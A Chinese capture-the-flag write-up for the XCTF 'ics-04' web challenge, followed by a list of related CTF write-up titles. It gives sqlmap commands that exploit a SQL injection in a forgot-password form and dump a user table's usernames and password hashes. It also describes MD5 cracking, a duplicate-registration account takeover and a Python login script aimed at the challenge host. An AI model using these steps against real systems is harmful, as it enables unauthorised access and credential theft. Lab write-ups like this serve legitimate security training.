题目:

解题思路:
注入点在忘记密码处,使用sqlmap一把梭

sqlmap -r 1.txt --dbs --batch
sqlmap -r 1.txt --dbs --batch -D cetc004 -T user -C 'username,password' --dump


直接解密md5,解密网址:https://www.somd5.com/
然后使用c3tlwDmIn23登录,即可获得flag

注:如果md5无法解密还可使用如下方法
1、利用可以重复注册的漏洞,测试方法,使用c3tlwDmIn23作为用户名重新注册,设置自己知道的密码,然后登陆,即可获得flag
2、网上还有一种,使用py脚本,但目前无法显示flag了,只有正确的密码才可以。经过抓包发现他不是前端md5加密,再和后端数据库中加密后的密码进行比对;有可能是后端md5加密,然后再进行比对
贴一下代码:如果以后有类似题目,可以参考

import requestsurl = 'http://159.138.137.79:61667/login.php'
username = 'c3tlwDmIn23'
password = '2f8667f381ff50ced6a3edc259260ba9'
data = {'username':username,'password':password}
req = requests.post(url,data=data)
req.encoding='utf-8'
print (req.text)

XCTF-高手进阶区:ics-04相关推荐

  1. 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp

    文章目录 解题部分 总结: 解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备-没有显示 ...

  2. 攻防世界 web高手进阶区 10分题 weiphp

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...

  3. 攻防世界 web高手进阶区 8分题 Web_python_block_chain

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是Web_python_block_chain的writeup 解题过程 这是个区块链题 这..裂开了啊 没搞过区块链 从零开始学习 ...

  4. 攻防世界 Reverse高手进阶区 2分题 reverse-for-the-holy-grail-350

    前言 继续ctf的旅程 攻防世界Reverse高手进阶区的2分题 本篇是reverse-for-the-holy-grail-350的writeup 发现攻防世界的题目分数是动态的 就仅以做题时的分数 ...

  5. 攻防世界 web高手进阶区 9分题 favorite_number

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...

  6. 攻防世界 Crypto高手进阶区 3分题 wtc_rsa_bbq

    前言 继续ctf的旅程 攻防世界Crypto高手进阶区的3分题 本篇是wtc_rsa_bbq的writeup 发现攻防世界的题目分数是动态的 就仅以做题时的分数为准了 解题过程 得到一个无后缀文件 扔 ...

  7. 攻防世界高手进阶区——dice_game

    攻防世界高手进阶区--dice_game 题目里面啥都没有. 一.分析文件 checksec 只有栈溢出保护关闭了,其他都是开着的. 运行 可以看出是要猜数字,猜对50次. ida逆向 __int64 ...

  8. 攻防世界高手进阶区 ——forgot

    攻防世界高手进阶区 --forgot 看了半天,啥也没看懂,做出来了才发现啥也不是. 一,分析文件 checksec 还好,只开启了堆栈不可执行. 运行一下 翻译了一下,应该是判断邮箱是否合乎规矩. ...

  9. forgot [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列13

    题目地址:forgot 本题是高手进阶区的第二题,恭喜大家已经进入高手行列!好假好假,哈哈哈! 废话不说,看看题目先 这个题目有很长的描述,但是都是废话,不去管他了. 照例下载附件,做下安全检查 ro ...

  10. 攻防世界 Crypto高手进阶区 3分题 你猜猜

    前言 继续ctf的旅程 攻防世界Crypto高手进阶区的3分题 本篇是你猜猜的writeup 发现攻防世界的题目分数是动态的 就仅以做题时的分数为准了 解题过程 得到一串16进制 504B03040A ...

最新文章

  1. 慕课网基于ElasticSearch的找房网实战开发企业级房屋搜索网项目学习心得(一)
  2. android java服务器文件传输_java – 使用FTPS将文件从android传输到服务器
  3. 水晶报表钻取(深化)之分组法
  4. Linux循环链表删除节点,删除循环单链表开头元素
  5. 用c语言编写程序学工系统,[工学]chap02_用C语言编写程序.ppt
  6. numpy.arcsin详解
  7. 【NLP】使用BERT完成NLP任务
  8. 博客园2013年5月份第1周源码发布详情
  9. 【BZOJ4916】神犇和蒟蒻(杜教筛)
  10. centos7mysql语句创建表格_CentOS7中安装MySQL(简便)及 网站的搭建
  11. C++ 使用模板Template
  12. 6-6-阶段案例:传智书城JSP页面
  13. Java抽象类、接口和内部类
  14. GDAL库中WFS服务中含有中文不能获取数据的问题
  15. win8下IE10停止工作解决办法
  16. js 设置div超出宽度隐藏_【CSS/JS】如何实现单行/多行文本溢出的省略(...)--绕过坑道的正确姿势...
  17. 参考TLC5615基于verilog HDL实现SPI时序
  18. 西北大学2019年春季校赛题解(G-L)
  19. Mybatis | Mybatis-plus配置多数据源,连接多数据库
  20. 用脚本批量消除视频噪声

热门文章

  1. 《剑指offer》从上往下打印二叉树
  2. 总结:华科教授给本校2013级计算机学院硕士生论文提的几点意见
  3. mysql索引篇之覆盖索引、联合索引、索引下推
  4. [集合]线程安全的HashMap
  5. javascript面向对象技术基础(四)
  6. JavaScript中的数组和字符串
  7. Ruby离线安装gem依赖
  8. 又拍云张聪谈安全、HTTPS、自定义、CDN的未来趋势
  9. Objective-C语法汇总
  10. POJ3070 Fibonacci(矩阵快速幂)